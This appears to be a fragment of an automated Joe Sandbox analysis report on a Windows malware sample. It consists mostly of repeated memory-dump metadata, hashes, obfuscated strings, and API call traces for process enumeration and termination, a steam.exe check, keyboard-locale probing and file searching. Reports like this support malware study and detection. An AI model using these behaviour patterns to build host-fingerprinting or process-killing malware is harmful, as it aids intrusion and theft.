                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: c700668478e12f5b38917ead6b9bb6d9b5093bb5ef5e93589dea4150b6a97193
                                  • Instruction ID: eaac87f521d7bd0206dffdff7b5833bd71b140630724cc6dcd087e47d526e2c5
                                  • Opcode Fuzzy Hash: c700668478e12f5b38917ead6b9bb6d9b5093bb5ef5e93589dea4150b6a97193
                                  • Instruction Fuzzy Hash: 44413D31531756CBCB32EF24DD85BDE77A4AF54341F105168B88AAB252CF309C698F90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002D46B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D46C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D46DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 002D46ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D4702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002D4711
                                  • CloseHandle.KERNEL32(00000000), ref: 002D4718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D4726
                                  • CloseHandle.KERNEL32(00000000), ref: 002D4731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 711fa4c96f3f05b5e8da466a4c880764b01ecdf23fed621a9b9a19343d537fb7
                                  • Instruction ID: 797c1e7d4a5fd3a374c972d1b3867677c109b679b9ec645af6169f221f4fecd1
                                  • Opcode Fuzzy Hash: 711fa4c96f3f05b5e8da466a4c880764b01ecdf23fed621a9b9a19343d537fb7
                                  • Instruction Fuzzy Hash: CA01A1315111556BEB20AB609CCCFFA777CAB49B11F0400A9F90999181EF749D508A68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &`?n$O7Mo$]X5o$q%\$r?f$xcgv$zl'~$}uV$9P/
                                  • API String ID: 0-2738552638
                                  • Opcode ID: 7421d8336add41cdffc5511a7557a1c0939e2df05c8640f2a25e18c7b1b898d1
                                  • Instruction ID: 5abf5e741e099997c37b33adad982e994c7863931a4f91b18eed291c942e21a1
                                  • Opcode Fuzzy Hash: 7421d8336add41cdffc5511a7557a1c0939e2df05c8640f2a25e18c7b1b898d1
                                  • Instruction Fuzzy Hash: 8AB22DF3A082049FE304AE2DEC8567BBBD9EFD4720F1A853DE6C4C7744E97598058692
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7sz$@X>{$\f;$d8m$gPu/$qI]$xJYc$|j;$lw/
                                  • API String ID: 0-1601643683
                                  • Opcode ID: 489083fa78044b4d6f1c94db448143bfc7e1831062586664c7741d36be2ca454
                                  • Instruction ID: 9a0aaaf8b134e27e77ef53417d4b4233918392eb69cb608acb39aae1fa4846d5
                                  • Opcode Fuzzy Hash: 489083fa78044b4d6f1c94db448143bfc7e1831062586664c7741d36be2ca454
                                  • Instruction Fuzzy Hash: C6B2C3F260C2009FE304AE2DEC8567AB7E5EF94720F1A893DE6C5C7744EA3598418797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &YZo$?^y$P?$gyz$gyz$yUlc$?NK$M|=$Zfs
                                  • API String ID: 0-2229435254
                                  • Opcode ID: 69aca2a78aedc0cfe60aa339bfb7760fbc8d998e59105679ce8b50530232ac53
                                  • Instruction ID: c5f98cc090eaacbd17dafde96d0b3ea2c3475aad51922a65ac092181d7f544f1
                                  • Opcode Fuzzy Hash: 69aca2a78aedc0cfe60aa339bfb7760fbc8d998e59105679ce8b50530232ac53
                                  • Instruction Fuzzy Hash: C6A206F36086009FE304AE2DDC8567AFBE5EFD4720F1A893DEAC497704E63598118697
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 002D4628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D4638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 002D4660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D4672
                                  • CloseHandle.KERNEL32(00000000), ref: 002D467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 9345b2cdb7cfa364fd843df7a1a14840cc169134fed6661e4b88eb0827565e47
                                  • Instruction ID: d4215c65c4e6871e4a9970a816d70a1a68bd20f4a04320a7f8644896cc18fc80
                                  • Opcode Fuzzy Hash: 9345b2cdb7cfa364fd843df7a1a14840cc169134fed6661e4b88eb0827565e47
                                  • Instruction Fuzzy Hash: 36018F71611124ABDB20EF60AC88FEA77ACEB09350F4401E6F909D5181EB74CDA48AE9
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4B7F
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BA7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: cd29cac9afa117dc4ad5e2aeb8b9803dfc4957d20025b4b72e7bef7ba819acf3
                                  • Instruction ID: b1882de03b731a147753538582471c2affc6d4c91326510e25045969a6a94997
                                  • Opcode Fuzzy Hash: cd29cac9afa117dc4ad5e2aeb8b9803dfc4957d20025b4b72e7bef7ba819acf3
                                  • Instruction Fuzzy Hash: AF312E31531656DBDB22FF24ED85FDF77A5AF40354F200229B849AB251CB30DC258B90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $o}$%rn/$&_l/$-R)$/Z}c$kk=l$vo^$=}
                                  • API String ID: 0-2929429453
                                  • Opcode ID: 926ca04cd0f1e724cb455502cd965171bd28ecdb0c7164e06b6c9de8eacd832d
                                  • Instruction ID: bf5e7a001c76949cd239970c5499816045d9328c05f11ef5d5d3a483a42daafd
                                  • Opcode Fuzzy Hash: 926ca04cd0f1e724cb455502cd965171bd28ecdb0c7164e06b6c9de8eacd832d
                                  • Instruction Fuzzy Hash: 35B2D6F360C2009FE308AE29EC8567AF7E5EFD4720F1A893DE6C5C7744EA3558418696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &n[w$0Y.$X3_e$Y#$tT~u$v~]$.C_$:~
                                  • API String ID: 0-1707199500
                                  • Opcode ID: 9da7401f7879548a6792cd2d1905939d045638f22de76b58dfe1e12307f17dc2
                                  • Instruction ID: cc74cb8f3075e690ce7aad0443bf68efed783ba93803304168b8cd80ea418fef
                                  • Opcode Fuzzy Hash: 9da7401f7879548a6792cd2d1905939d045638f22de76b58dfe1e12307f17dc2
                                  • Instruction Fuzzy Hash: 0EB206F360C2009FE308AE2DEC8567ABBE5EF94720F16893DE6C587744E63598418797
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002D2D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002D2DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002D2DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002D2DEC
                                  • LocalFree.KERNEL32(00000000), ref: 002D2FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: a1d045ec8030f8ecb56cc95b0338c7204a164f9ad3786934ce29274061479f49
                                  • Instruction ID: 87adbf059bec1df2ac5ff7f0c7044a6772b7d5dc208f7c779159a457309e0221
                                  • Opcode Fuzzy Hash: a1d045ec8030f8ecb56cc95b0338c7204a164f9ad3786934ce29274061479f49
                                  • Instruction Fuzzy Hash: FAB11771910205CFD715CF18C988B99B7F1FB44325F29C5AAD408AB3A2D776AD96CF80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: f{$'kV}$-e]K$?sKf$MG]o$su7|$uYz
                                  • API String ID: 0-1046906218
                                  • Opcode ID: aa35f23f319291e8736ea33baad57934535ee50f37b1b8843a65c07afde705ff
                                  • Instruction ID: 2731a8470de025cce313df8b7328e987bcf0672c630de3fb4934f0e46cb2b5ba
                                  • Opcode Fuzzy Hash: aa35f23f319291e8736ea33baad57934535ee50f37b1b8843a65c07afde705ff
                                  • Instruction Fuzzy Hash: 70B247F3A0C2049FE3046E2DEC8567AFBE9EF94360F1A463DEAC4C7744E63558058696
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 002D2C58
                                  • wsprintfA.USER32 ref: 002D2C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
